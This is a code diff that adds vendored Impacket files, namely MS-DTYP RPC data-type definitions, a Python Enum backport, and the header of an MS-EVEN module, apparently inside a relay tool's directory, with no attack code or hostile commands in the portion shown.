+    referent = (
+        ('Data', FLOAT),
+    )
+
+# 2.2.18 HRESULT
+HRESULT = NDRLONG
+class PHRESULT(NDRPOINTER):
+    referent = (
+        ('Data', HRESULT),
+    )
+
+# 2.2.19 INT
+INT = NDRLONG
+class PINT(NDRPOINTER):
+    referent = (
+        ('Data', INT),
+    )
+
+# 2.2.26 LMSTR
+LMSTR = LPWSTR
+
+# 2.2.27 LONG
+LONG = NDRLONG
+class LPLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONG),
+    )
+
+PLONG = LPLONG
+
+# 2.2.28 LONGLONG
+LONGLONG = NDRHYPER
+
+class PLONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONGLONG),
+    )
+
+# 2.2.31 LONG64
+LONG64 = NDRUHYPER
+class PLONG64(NDRPOINTER):
+    referent = (
+        ('Data', LONG64),
+    )
+
+# 2.2.32 LPCSTR
+LPCSTR = LPSTR
+
+# 2.2.36 NET_API_STATUS
+NET_API_STATUS = DWORD
+
+# 2.2.52 ULONG_PTR
+ULONG_PTR = NDRULONG
+# 2.2.10 DWORD_PTR
+DWORD_PTR = ULONG_PTR
+
+# 2.3.2 GUID and UUID
+class GUID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 4
+
+class PGUID(NDRPOINTER):
+    referent = (
+        ('Data', GUID),
+    )
+
+UUID = GUID
+PUUID = PGUID
+
+# 2.2.37 NTSTATUS
+NTSTATUS = DWORD
+
+# 2.2.45 UINT
+UINT = NDRULONG
+class PUINT(NDRPOINTER):
+    referent = (
+        ('Data', UINT),
+    )
+
+# 2.2.50 ULONG
+ULONG = NDRULONG
+class PULONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONG),
+    )
+
+LPULONG = PULONG
+
+# 2.2.54 ULONGLONG
+ULONGLONG = NDRUHYPER
+class PULONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONGLONG),
+    )
+
+# 2.2.57 USHORT
+USHORT = NDRUSHORT
+class PUSHORT(NDRPOINTER):
+    referent = (
+        ('Data', USHORT),
+    )
+
+# 2.2.59 WCHAR
+WCHAR = WSTR
+PWCHAR = LPWSTR
+
+# 2.2.61 WORD
+WORD = NDRUSHORT
+class PWORD(NDRPOINTER):
+    referent = (
+        ('Data', WORD),
+    )
+LPWORD = PWORD
+
+# 2.3.1 FILETIME
+class FILETIME(NDRSTRUCT):
+    structure = (
+        ('dwLowDateTime', DWORD),
+        ('dwHighDateTime', LONG),
+    )
+
+class PFILETIME(NDRPOINTER):
+    referent = (
+        ('Data', FILETIME),
+    )
+
+# 2.3.3 LARGE_INTEGER
+LARGE_INTEGER = NDRHYPER
+class PLARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', LARGE_INTEGER),
+    )
+
+# 2.3.5 LUID
+class LUID(NDRSTRUCT):
+    structure = (
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    )
+
+# 2.3.8 RPC_UNICODE_STRING
+class RPC_UNICODE_STRING(NDRSTRUCT):
+    # Here we're doing some tricks to make this data type
+    # easier to use. It's exactly the same as defined. I changed the
+    # Buffer name for Data, so users can write directly to the datatype
+    # instead of writing to datatype['Buffer'].
+    # The drawback is you cannot directly access the Length and 
+    # MaximumLength fields. 
+    # If you really need it, you will need to do it this way:
+    # class TT(NDRCALL):
+    # structure = (
+    #     ('str1', RPC_UNICODE_STRING),
+    #  )
+    # 
+    # nn = TT()
+    # nn.fields['str1'].fields['MaximumLength'] = 30
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPWSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            try:
+                value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                value = value.decode(sys.getfilesystemencoding())
+            self['Length'] = len(value)*2
+            self['MaximumLength'] = len(value)*2
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+class PRPC_UNICODE_STRING(NDRPOINTER):
+    referent = (
+       ('Data', RPC_UNICODE_STRING ),
+    )
+
+# 2.3.9 OBJECT_TYPE_LIST
+ACCESS_MASK = DWORD
+class OBJECT_TYPE_LIST(NDRSTRUCT):
+    structure = (
+        ('Level', WORD),
+        ('Remaining',ACCESS_MASK),
+        ('ObjectType',PGUID),
+    )
+
+class POBJECT_TYPE_LIST(NDRPOINTER):
+    referent = (
+       ('Data', OBJECT_TYPE_LIST ),
+    )
+
+# 2.3.13 SYSTEMTIME
+class SYSTEMTIME(NDRSTRUCT):
+    structure = (
+        ('wYear', WORD),
+        ('wMonth', WORD),
+        ('wDayOfWeek', WORD),
+        ('wDay', WORD),
+        ('wHour', WORD),
+        ('wMinute', WORD),
+        ('wSecond', WORD),
+        ('wMilliseconds', WORD),
+    )
+
+class PSYSTEMTIME(NDRPOINTER):
+    referent = (
+       ('Data', SYSTEMTIME ),
+    )
+
+# 2.3.15 ULARGE_INTEGER
+class ULARGE_INTEGER(NDRSTRUCT):
+    structure = (
+        ('QuadPart', LONG64),
+    )
+
+class PULARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', ULARGE_INTEGER),
+    )
+
+# 2.4.2.3 RPC_SID
+class DWORD_ARRAY(NDRUniConformantArray):
+    item = '<L'
+
+class RPC_SID_IDENTIFIER_AUTHORITY(NDRUniFixedArray):
+    align = 1
+    align64 = 1
+    def getDataLen(self, data, offset=0):
+        return 6
+
+class RPC_SID(NDRSTRUCT):
+    structure = (
+        ('Revision',NDRSMALL),
+        ('SubAuthorityCount',NDRSMALL),
+        ('IdentifierAuthority',RPC_SID_IDENTIFIER_AUTHORITY),
+        ('SubAuthority',DWORD_ARRAY),
+    )
+    def getData(self, soFar = 0):
+        self['SubAuthorityCount'] = len(self['SubAuthority'])
+        return NDRSTRUCT.getData(self, soFar)
+
+    def fromCanonical(self, canonical):
+        items = canonical.split('-')
+        self['Revision'] = int(items[1])
+        self['IdentifierAuthority'] = b'\x00\x00\x00\x00\x00' + pack('B',int(items[2]))
+        self['SubAuthorityCount'] = len(items) - 3
+        for i in range(self['SubAuthorityCount']):
+            self['SubAuthority'].append(int(items[i+3]))
+
+    def formatCanonical(self):
+        ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority'][5:6]))
+        for i in range(self['SubAuthorityCount']):
+            ans += '-%d' % self['SubAuthority'][i]
+        return ans
+
+class PRPC_SID(NDRPOINTER):
+    referent = (
+        ('Data', RPC_SID),
+    )
+
+PSID = PRPC_SID
+
+# 2.4.3 ACCESS_MASK
+GENERIC_READ            = 0x80000000
+GENERIC_WRITE           = 0x40000000
+GENERIC_EXECUTE         = 0x20000000
+GENERIC_ALL             = 0x10000000
+MAXIMUM_ALLOWED         = 0x02000000
+ACCESS_SYSTEM_SECURITY  = 0x01000000
+SYNCHRONIZE             = 0x00100000
+WRITE_OWNER             = 0x00080000
+WRITE_DACL              = 0x00040000
+READ_CONTROL            = 0x00020000
+DELETE                  = 0x00010000
+
+# 2.4.5.1 ACL--RPC Representation
+class ACL(NDRSTRUCT):
+    structure = (
+        ('AclRevision',NDRSMALL),
+        ('Sbz1',NDRSMALL),
+        ('AclSize',NDRSHORT),
+        ('AceCount',NDRSHORT),
+        ('Sbz2',NDRSHORT),
+    )
+
+class PACL(NDRPOINTER):
+    referent = (
+        ('Data', ACL),
+    )
+
+# 2.4.6.1 SECURITY_DESCRIPTOR--RPC Representation
+class SECURITY_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Revision',UCHAR),
+        ('Sbz1',UCHAR),
+        ('Control',USHORT),
+        ('Owner',PSID),
+        ('Group',PSID),
+        ('Sacl',PACL),
+        ('Dacl',PACL),
+    )
+
+# 2.4.7 SECURITY_INFORMATION
+OWNER_SECURITY_INFORMATION            = 0x00000001
+GROUP_SECURITY_INFORMATION            = 0x00000002
+DACL_SECURITY_INFORMATION             = 0x00000004
+SACL_SECURITY_INFORMATION             = 0x00000008
+LABEL_SECURITY_INFORMATION            = 0x00000010
+UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000
+UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000
+PROTECTED_SACL_SECURITY_INFORMATION   = 0x40000000
+PROTECTED_DACL_SECURITY_INFORMATION   = 0x80000000
+ATTRIBUTE_SECURITY_INFORMATION        = 0x00000020
+SCOPE_SECURITY_INFORMATION            = 0x00000040
+BACKUP_SECURITY_INFORMATION           = 0x00010000
+
+SECURITY_INFORMATION = DWORD
+class PSECURITY_INFORMATION(NDRPOINTER):
+    referent = (
+        ('Data', SECURITY_INFORMATION),
+    )
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/enum.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/enum.py
@@ -0,0 +1,754 @@
+"""Python Enumerations"""
+
+import sys as _sys
+
+__all__ = ['Enum', 'IntEnum', 'unique']
+
+pyver = float('%s.%s' % _sys.version_info[:2])
+
+try:
+    any
+except NameError:
+    def any(iterable):
+        for element in iterable:
+            if element:
+                return True
+        return False
+
+
+class _RouteClassAttributeToGetattr(object):
+    """Route attribute access on a class to __getattr__.
+
+    This is a descriptor, used to define attributes that act differently when
+    accessed through an instance and through a class.  Instance access remains
+    normal, but access to an attribute through a class will be routed to the
+    class's __getattr__ method; this is done by raising AttributeError.
+
+    """
+    def __init__(self, fget=None):
+        self.fget = fget
+
+    def __get__(self, instance, ownerclass=None):
+        if instance is None:
+            raise AttributeError()
+        return self.fget(instance)
+
+    def __set__(self, instance, value):
+        raise AttributeError("can't set attribute")
+
+    def __delete__(self, instance):
+        raise AttributeError("can't delete attribute")
+
+
+def _is_descriptor(obj):
+    """Returns True if obj is a descriptor, False otherwise."""
+    return (
+            hasattr(obj, '__get__') or
+            hasattr(obj, '__set__') or
+            hasattr(obj, '__delete__'))
+
+
+def _is_dunder(name):
+    """Returns True if a __dunder__ name, False otherwise."""
+    return (name[:2] == name[-2:] == '__' and
+            name[2:3] != '_' and
+            name[-3:-2] != '_' and
+            len(name) > 4)
+
+
+def _is_sunder(name):
+    """Returns True if a _sunder_ name, False otherwise."""
+    return (name[0] == name[-1] == '_' and 
+            name[1:2] != '_' and
+            name[-2:-1] != '_' and
+            len(name) > 2)
+
+
+def _make_class_unpicklable(cls):
+    """Make the given class un-picklable."""
+    def _break_on_call_reduce(self):
+        raise TypeError('%r cannot be pickled' % self)
+    cls.__reduce__ = _break_on_call_reduce
+    cls.__module__ = '<unknown>'
+
+
+class _EnumDict(dict):
+    """Track enum member order and ensure member names are not reused.
+
+    EnumMeta will use the names found in self._member_names as the
+    enumeration member names.
+
+    """
+    def __init__(self):
+        super(_EnumDict, self).__init__()
+        self._member_names = []
+
+    def __setitem__(self, key, value):
+        """Changes anything not dundered or not a descriptor.
+
+        If a descriptor is added with the same name as an enum member, the name
+        is removed from _member_names (this may leave a hole in the numerical
+        sequence of values).
+
+        If an enum member name is used twice, an error is raised; duplicate
+        values are not checked for.
+
+        Single underscore (sunder) names are reserved.
+
+        Note:   in 3.x __order__ is simply discarded as a not necessary piece
+                leftover from 2.x
+
+        """
+        if pyver >= 3.0 and key == '__order__':
+                return
+        if _is_sunder(key):
+            raise ValueError('_names_ are reserved for future Enum use')
+        elif _is_dunder(key):
+            pass
+        elif key in self._member_names:
+            # descriptor overwriting an enum?
+            raise TypeError('Attempted to reuse key: %r' % key)
+        elif not _is_descriptor(value):
+            if key in self:
+                # enum overwriting a descriptor?
+                raise TypeError('Key already defined as: %r' % self[key])
+            self._member_names.append(key)
+        super(_EnumDict, self).__setitem__(key, value)
+
+
+# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until
+# EnumMeta finishes running the first time the Enum class doesn't exist.  This
+# is also why there are checks in EnumMeta like `if Enum is not None`
+Enum = None
+
+
+class EnumMeta(type):
+    """Metaclass for Enum"""
+    @classmethod
+    def __prepare__(metacls, cls, bases):
+        return _EnumDict()
+
+    def __new__(metacls, cls, bases, classdict):
+        # an Enum class is final once enumeration items have been defined; it
+        # cannot be mixed with other types (int, float, etc.) if it has an
+        # inherited __new__ unless a new __new__ is defined (or the resulting
+        # class will fail).
+        if type(classdict) is dict:
+            original_dict = classdict
+            classdict = _EnumDict()
+            for k, v in original_dict.items():
+                classdict[k] = v
+
+        member_type, first_enum = metacls._get_mixins_(bases)
+        #if member_type is object:
+        #    use_args = False
+        #else:
+        #    use_args = True
+        __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
+                                                        first_enum)
+        # save enum items into separate mapping so they don't get baked into
+        # the new class
+        members = dict((k, classdict[k]) for k in classdict._member_names)
+        for name in classdict._member_names:
+            del classdict[name]
+
+        # py2 support for definition order
+        __order__ = classdict.get('__order__')
+        if __order__ is None:
+            __order__ = classdict._member_names
+            if pyver < 3.0:
+                order_specified = False
+            else:
+                order_specified = True
+        else:
+            del classdict['__order__']
+            order_specified = True
+            if pyver < 3.0:
+                __order__ = __order__.replace(',', ' ').split()
+                aliases = [name for name in members if name not in __order__]
+                __order__ += aliases
+
+        # check for illegal enum names (any others?)
+        invalid_names = set(members) & set(['mro'])
+        if invalid_names:
+            raise ValueError('Invalid enum member name(s): %s' % (
+                ', '.join(invalid_names), ))
+
+        # create our new Enum type
+        enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
+        enum_class._member_names_ = []               # names in random order
+        enum_class._member_map_ = {}                 # name->value map
+        enum_class._member_type_ = member_type
+
+        # Reverse value->name map for hashable values.
+        enum_class._value2member_map_ = {}
+
+        # check for a __getnewargs__, and if not present sabotage
+        # pickling, since it won't work anyway
+        if (member_type is not object and
+            member_type.__dict__.get('__getnewargs__') is None
+            ):
+            _make_class_unpicklable(enum_class)
+
+        # instantiate them, checking for duplicates as we go
+        # we instantiate first instead of checking for duplicates first in case
+        # a custom __new__ is doing something funky with the values -- such as
+        # auto-numbering ;)
+        if __new__ is None:
+            __new__ = enum_class.__new__
+        for member_name in __order__:
+            value = members[member_name]
+            if not isinstance(value, tuple):
+                args = (value, )
+            else:
+                args = value
+            if member_type is tuple:   # special case for tuple enums
+                args = (args, )     # wrap it one more time
+            if not use_args or not args:
+                enum_member = __new__(enum_class)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = value
+            else:
+                enum_member = __new__(enum_class, *args)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = member_type(*args)
+            value = enum_member._value_
+            enum_member._name_ = member_name
+            enum_member.__objclass__ = enum_class
+            enum_member.__init__(*args)
+            # If another member with the same value was already defined, the
+            # new member becomes an alias to the existing one.
+            for name, canonical_member in enum_class._member_map_.items():
+                if canonical_member.value == enum_member._value_:
+                    enum_member = canonical_member
+                    break
+            else:
+                # Aliases don't appear in member names (only in __members__).
+                enum_class._member_names_.append(member_name)
+            enum_class._member_map_[member_name] = enum_member
+            try:
+                # This may fail if value is not hashable. We can't add the value
+                # to the map, and by-value lookups for this value will be
+                # linear.
+                enum_class._value2member_map_[value] = enum_member
+            except TypeError:
+                pass
+
+        # in Python2.x we cannot know definition order, so go with value order
+        # unless __order__ was specified in the class definition
+        if not order_specified:
+            enum_class._member_names_ = [
+                e[0] for e in sorted(
+                [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],
+                 key=lambda t: t[1]._value_
+                        )]
+
+        # double check that repr and friends are not the mixin's or various
+        # things break (such as pickle)
+        if Enum is not None:
+            setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)
+        for name in ('__repr__', '__str__', '__format__'):
+            class_method = getattr(enum_class, name)
+            obj_method = getattr(member_type, name, None)
+            enum_method = getattr(first_enum, name, None)
+            if obj_method is not None and obj_method is class_method:
+                setattr(enum_class, name, enum_method)
+
+        # method resolution and int's are not playing nice
+        # Python's less than 2.6 use __cmp__
+
+        if pyver < 2.6:
+
+            if issubclass(enum_class, int):
+                setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))
+
+        elif pyver < 3.0:
+
+            if issubclass(enum_class, int):
+                for method in (
+                        '__le__',
+                        '__lt__',
+                        '__gt__',
+                        '__ge__',
+                        '__eq__',
+                        '__ne__',
+                        '__hash__',
+                        ):
+                    setattr(enum_class, method, getattr(int, method))
+
+        # replace any other __new__ with our own (as long as Enum is not None,
+        # anyway) -- again, this is to support pickle
+        if Enum is not None:
+            # if the user defined their own __new__, save it before it gets
+            # clobbered in case they subclass later
+            if save_new:
+                setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
+            setattr(enum_class, '__new__', Enum.__dict__['__new__'])
+        return enum_class
+
+    def __call__(cls, value, names=None, module=None, type=None):
+        """Either returns an existing member, or creates a new enum class.
+
+        This method is used both when an enum class is given a value to match
+        to an enumeration member (i.e. Color(3)) and for the functional API
+        (i.e. Color = Enum('Color', names='red green blue')).
+
+        When used for the functional API: `module`, if set, will be stored in
+        the new class' __module__ attribute; `type`, if set, will be mixed in
+        as the first base class.
+
+        Note: if `module` is not set this routine will attempt to discover the
+        calling module by walking the frame stack; if this is unsuccessful
+        the resulting class will not be pickleable.
+
+        """
+        if names is None:  # simple value lookup
+            return cls.__new__(cls, value)
+        # otherwise, functional API: we're creating a new Enum type
+        return cls._create_(value, names, module=module, type=type)
+
+    def __contains__(cls, member):
+        return isinstance(member, cls) and member.name in cls._member_map_
+
+    def __delattr__(cls, attr):
+        # nicer error message when someone tries to delete an attribute
+        # (see issue19025).
+        if attr in cls._member_map_:
+            raise AttributeError(
+                    "%s: cannot delete Enum member." % cls.__name__)
+        super(EnumMeta, cls).__delattr__(attr)
+
+    def __dir__(self):
+        return (['__class__', '__doc__', '__members__', '__module__'] +
+                self._member_names_)
+
+    @property
+    def __members__(cls):
+        """Returns a mapping of member name->value.
+
+        This mapping lists all enum members, including aliases. Note that this
+        is a copy of the internal mapping.
+
+        """
+        return cls._member_map_.copy()
+
+    def __getattr__(cls, name):
+        """Return the enum member matching `name`
+
+        We use __getattr__ instead of descriptors or inserting into the enum
+        class' __dict__ in order to support `name` and `value` being both
+        properties for enum members (which live in the class' __dict__) and
+        enum members themselves.
+
+        """
+        if _is_dunder(name):
+            raise AttributeError(name)
+        try:
+            return cls._member_map_[name]
+        except KeyError:
+            raise AttributeError(name)
+
+    def __getitem__(cls, name):
+        return cls._member_map_[name]
+
+    def __iter__(cls):
+        return (cls._member_map_[name] for name in cls._member_names_)
+
+    def __reversed__(cls):
+        return (cls._member_map_[name] for name in reversed(cls._member_names_))
+
+    def __len__(cls):
+        return len(cls._member_names_)
+
+    def __repr__(cls):
+        return "<enum %r>" % cls.__name__
+
+    def __setattr__(cls, name, value):
+        """Block attempts to reassign Enum members.
+
+        A simple assignment to the class namespace only changes one of the
+        several possible ways to get an Enum member from the Enum class,
+        resulting in an inconsistent Enumeration.
+
+        """
+        member_map = cls.__dict__.get('_member_map_', {})
+        if name in member_map:
+            raise AttributeError('Cannot reassign members.')
+        super(EnumMeta, cls).__setattr__(name, value)
+
+    def _create_(cls, class_name, names=None, module=None, type=None):
+        """Convenience method to create a new Enum class.
+
+        `names` can be:
+
+        * A string containing member names, separated either with spaces or
+          commas.  Values are auto-numbered from 1.
+        * An iterable of member names.  Values are auto-numbered from 1.
+        * An iterable of (member name, value) pairs.
+        * A mapping of member name -> value.
+
+        """
+        metacls = cls.__class__
+        if type is None:
+            bases = (cls, )
+        else:
+            bases = (type, cls)
+        classdict = metacls.__prepare__(class_name, bases)
+        __order__ = []
+
+        # special processing needed for names?
+        if isinstance(names, str):
+            names = names.replace(',', ' ').split()
+        if isinstance(names, (tuple, list)) and isinstance(names[0], str):
+            names = [(e, i+1) for (i, e) in enumerate(names)]
+
+        # Here, names is either an iterable of (name, value) or a mapping.
+        for item in names:
+            if isinstance(item, str):
+                member_name, member_value = item, names[item]
+            else:
+                member_name, member_value = item
+            classdict[member_name] = member_value
+            __order__.append(member_name)
+        # only set __order__ in classdict if name/value was not from a mapping
+        if not isinstance(item, str):
+            classdict['__order__'] = ' '.join(__order__)
+        enum_class = metacls.__new__(metacls, class_name, bases, classdict)
+
+        # TODO: replace the frame hack if a blessed way to know the calling
+        # module is ever developed
+        if module is None:
+            try:
+                module = _sys._getframe(2).f_globals['__name__']
+            except (AttributeError, ValueError):
+                pass
+        if module is None:
+            _make_class_unpicklable(enum_class)
+        else:
+            enum_class.__module__ = module
+
+        return enum_class
+
+    @staticmethod
+    def _get_mixins_(bases):
+        """Returns the type for creating enum members, and the first inherited
+        enum class.
+
+        bases: the tuple of bases that was given to __new__
+
+        """
+        if not bases or Enum is None:
+            return object, Enum
+        
+
+        # double check that we are not subclassing a class with existing
+        # enumeration members; while we're at it, see if any other data
+        # type has been mixed in so we can use the correct __new__
+        member_type = first_enum = None
+        for base in bases:
+            if  (base is not Enum and
+                    issubclass(base, Enum) and
+                    base._member_names_):
+                raise TypeError("Cannot extend enumerations")
+        # base is now the last base in bases
+        if not issubclass(base, Enum):
+            raise TypeError("new enumerations must be created as "
+                    "`ClassName([mixin_type,] enum_type)`")
+
+        # get correct mix-in type (either mix-in type of Enum subclass, or
+        # first base if last base is Enum)
+        if not issubclass(bases[0], Enum):
+            member_type = bases[0]     # first data type
+            first_enum = bases[-1]  # enum type
+        else:
+            for base in bases[0].__mro__:
+                # most common: (IntEnum, int, Enum, object)
+                # possible:    (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>,
+                #               <class 'int'>, <Enum 'Enum'>,
+                #               <class 'object'>)
+                if issubclass(base, Enum):
+                    if first_enum is None:
+                        first_enum = base
+                else:
+                    if member_type is None:
+                        member_type = base
+
+        return member_type, first_enum
+
+    if pyver < 3.0:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+            if __new__:
+                return None, True, True      # __new__, save_new, use_args
+
+            N__new__ = getattr(None, '__new__')
+            O__new__ = getattr(object, '__new__')
+            if Enum is None:
+                E__new__ = N__new__
+            else:
+                E__new__ = Enum.__dict__['__new__']
+            # check all possibles for __member_new__ before falling back to
+            # __new__
+            for method in ('__member_new__', '__new__'):
+                for possible in (member_type, first_enum):
+                    try:
+                        target = possible.__dict__[method]
+                    except (AttributeError, KeyError):
+                        target = getattr(possible, method, None)
+                    if target not in [
+                            None,
+                            N__new__,
+                            O__new__,
+                            E__new__,
+                            ]:
+                        if method == '__member_new__':
+                            classdict['__new__'] = target
+                            return None, False, True
+                        if isinstance(target, staticmethod):
+                            target = target.__get__(member_type)
+                        __new__ = target
+                        break
+                if __new__ is not None:
+                    break
+            else:
+                __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, False, use_args
+    else:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+
+            # should __new__ be saved as __member_new__ later?
+            save_new = __new__ is not None
+
+            if __new__ is None:
+                # check all possibles for __member_new__ before falling back to
+                # __new__
+                for method in ('__member_new__', '__new__'):
+                    for possible in (member_type, first_enum):
+                        target = getattr(possible, method, None)
+                        if target not in (
+                                None,
+                                None.__new__,
+                                object.__new__,
+                                Enum.__new__,
+                                ):
+                            __new__ = target
+                            break
+                    if __new__ is not None:
+                        break
+                else:
+                    __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, save_new, use_args
+
+
+########################################################
+# In order to support Python 2 and 3 with a single
+# codebase we have to create the Enum methods separately
+# and then use the `type(name, bases, dict)` method to
+# create the class.
+########################################################
+temp_enum_dict = {}
+temp_enum_dict['__doc__'] = "Generic enumeration.\n\n    Derive from this class to define new enumerations.\n\n"
+
+def __new__(cls, value):
+    # all enum instances are actually created during class construction
+    # without calling this method; this method is called by the metaclass'
+    # __call__ (i.e. Color(3) ), and by pickle
+    if type(value) is cls:
+        # For lookups like Color(Color.red)
+        value = value.value
+        #return value
+    # by-value search for a matching enum member
+    # see if it's in the reverse mapping (for hashable values)
+    try:
+        if value in cls._value2member_map_:
+            return cls._value2member_map_[value]
+    except TypeError:
+        # not there, now do long search -- O(n) behavior
+        for member in cls._member_map_.values():
+            if member.value == value:
+                return member
+    raise ValueError("%s is not a valid %s" % (value, cls.__name__))
+temp_enum_dict['__new__'] = __new__
+del __new__
+
+def __repr__(self):
+    return "<%s.%s: %r>" % (
+            self.__class__.__name__, self._name_, self._value_)
+temp_enum_dict['__repr__'] = __repr__
+del __repr__
+
+def __str__(self):
+    return "%s.%s" % (self.__class__.__name__, self._name_)
+temp_enum_dict['__str__'] = __str__
+del __str__
+
+def __dir__(self):
+    added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']
+    return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)
+temp_enum_dict['__dir__'] = __dir__
+del __dir__
+
+def __format__(self, format_spec):
+    # mixed-in Enums should use the mixed-in type's __format__, otherwise
+    # we can get strange results with the Enum name showing up instead of
+    # the value
+
+    # pure Enum branch
+    if self._member_type_ is object:
+        cls = str
+        val = str(self)
+    # mix-in branch
+    else:
+        cls = self._member_type_
+        val = self.value
+    return cls.__format__(val, format_spec)
+temp_enum_dict['__format__'] = __format__
+del __format__
+
+
+####################################
+# Python's less than 2.6 use __cmp__
+
+if pyver < 2.6:
+
+    def __cmp__(self, other):
+        if type(other) is self.__class__:
+            if self is other:
+                return 0
+            return -1
+        return NotImplemented
+        raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__cmp__'] = __cmp__
+    del __cmp__
+
+else:
+
+    def __le__(self, other):
+        raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__le__'] = __le__
+    del __le__
+
+    def __lt__(self, other):
+        raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__lt__'] = __lt__
+    del __lt__
+
+    def __ge__(self, other):
+        raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__ge__'] = __ge__
+    del __ge__
+
+    def __gt__(self, other):
+        raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__gt__'] = __gt__
+    del __gt__
+    
+
+def __eq__(self, other):
+    if type(other) is self.__class__:
+        return self is other
+    return NotImplemented
+temp_enum_dict['__eq__'] = __eq__
+del __eq__
+
+def __ne__(self, other):
+    if type(other) is self.__class__:
+        return self is not other
+    return NotImplemented
+temp_enum_dict['__ne__'] = __ne__
+del __ne__
+
+def __getnewargs__(self):
+    return (self._value_, )
+temp_enum_dict['__getnewargs__'] = __getnewargs__
+del __getnewargs__
+
+def __hash__(self):
+    return hash(self._name_)
+temp_enum_dict['__hash__'] = __hash__
+del __hash__
+
+# _RouteClassAttributeToGetattr is used to provide access to the `name`
+# and `value` properties of enum members while keeping some measure of
+# protection from modification, while still allowing for an enumeration
+# to have members named `name` and `value`.  This works because enumeration
+# members are not set directly on the enum class -- __getattr__ is
+# used to look them up.
+
+@_RouteClassAttributeToGetattr
+def name(self):
+    return self._name_
+temp_enum_dict['name'] = name
+del name
+
+@_RouteClassAttributeToGetattr
+def value(self):
+    return self._value_
+temp_enum_dict['value'] = value
+del value
+
+Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
+del temp_enum_dict
+
+# Enum has now been created
+###########################
+
+class IntEnum(int, Enum):
+    """Enum where members are also (and must be) ints"""
+
+
+def unique(enumeration):
+    """Class decorator that ensures only unique members exist in an enumeration."""
+    duplicates = []
+    for name, member in enumeration.__members__.items():
+        if name != member.name:
+            duplicates.append((name, member.name))
+    if duplicates:
+        duplicate_names = ', '.join(
+                ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
+                )
+        raise ValueError('duplicate names found in %r: %s' %
+                (enumeration, duplicate_names)
+                )
+    return enumeration
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even.py
@@ -0,0 +1,400 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#         Itamar Mizrahi (@MrAnde7son)
+#
+# Description:
+#   [MS-EVEN] Interface implementation
